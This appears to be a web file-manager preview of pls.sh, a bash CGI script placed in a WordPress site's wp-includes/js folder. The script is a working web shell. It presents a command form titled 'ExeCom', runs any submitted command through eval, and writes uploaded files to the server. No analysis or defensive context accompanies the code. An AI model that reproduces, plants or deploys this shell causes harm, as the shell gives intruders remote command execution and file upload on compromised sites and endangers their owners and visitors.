Preview: pls.sh
Size: 2.08 KB
/home/jambtst2015/public_html/cccng.org/wp-includes/js/pls.sh
#!/bin/bash
urldecode() {
local url="$1"
local decoded_url
# Replace '+' with ' '
url="${url//+/ }"
# Replace '%' with '\x'
url="${url//%/\\x}"
# Decode hex codes
decoded_url=$(echo -e "${url}" | sed 's/\\x\([0-9A-Fa-f][0-9A-Fa-f]\)/\\x\1/g')
echo "${decoded_url}"
}
echo "Content-type: text/html"
echo ""
echo "<!DOCTYPE html>"
echo "<html lang=\"en\">"
echo "<head>"
echo "<meta charset=\"UTF-8\">"
echo "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">"
echo "<title>ExeCom</title>"
echo "</head>"
echo "<body>"
echo "<h1>Execute Command</h1>"
echo "<form method=\"post\" action=\"$(basename "$0")\" enctype=\"multipart/form-data\">"
echo "<label for=\"command\">Enter Command:</label><br>"
echo "<input type=\"text\" id=\"command\" name=\"command\"><br><br>"
echo "<input type=\"file\" id=\"file\" name=\"file\"><br><br>"
echo "<input type=\"submit\" value=\"Execute\">"
echo "</form>"
if [ "$REQUEST_METHOD" = "POST" ]; then
if [ "$CONTENT_LENGTH" -gt 0 ]; then
in_raw="$(dd bs=1 count=$CONTENT_LENGTH)"
boundary=$(echo -n "$in_raw" | head -1 | tr -d '\r\n');
filename=$(echo -n "$in_raw" | grep --text --max-count=1 -oP "(?<=filename=\")[^\"]*");
command=$(echo "$in_raw" | awk -v RS="\r\n" '/Content-Disposition: form-data; name="command"/ {start=1;next}start==1 && length($0)>2{print$0;exit}')
#command=$(urldecode "$command")
if [ -n "$command" ]; then
echo "<title>Com Output</title>"
echo "</head>"
echo "<body>"
echo "<h1>Com: $command Output</h1>"
echo "<pre>"
eval "$command"
echo "</pre>"
if [ -n "$filename" ]; then
echo -n "$in_raw" > dump.txt
file_content=$(echo -n "$in_raw" | sed '1,/Content-Type:/d' | sed '1d'|sed '$d');
echo -n "$file_content" > "$filename"
md5some=$(printf "%b" "$file_content"|md5sum|awk '{print $1}')
echo "File '$filename' uploaded successfully. md5: $md5some"
fi
fi
fi
fi
echo "</body>"
echo "</html>"
Directory Contents
Dirs: 12 × Files: 102